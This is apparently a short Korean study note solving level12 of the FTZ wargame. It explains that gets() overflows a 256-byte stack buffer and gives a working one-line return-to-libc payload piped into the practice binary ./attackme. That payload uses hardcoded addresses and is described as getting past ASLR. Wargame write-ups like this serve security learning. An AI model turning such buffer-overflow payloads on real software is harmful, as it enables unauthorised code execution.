Pwnable/▷ Study
ftz level12
Gyeongje
2018. 2. 17. 21:01
level11이랑 거의 똑같다.
이번엔 level11처럼 argv로 입력받는 방식이 아닌 gets로 입력받는다.
gets에서 버퍼오버플로우가 터지므로 level11과 비슷하게 익스 짜주면 된다.
해당 문제도 마찬가지로 str[256] + dummy[8] + sfp[4] + ret[4] 로 구성되어 있으므로
(python -c 'print "A"*268 + "\xc0\xf2\x03\x42" + "AAAA" + "\xa4\x7e\x12\x42"';cat) | ./attackme
마찬가지로 ASLR 기법이 걸려있으므로 RTL 기법으로 문제를 풀었다.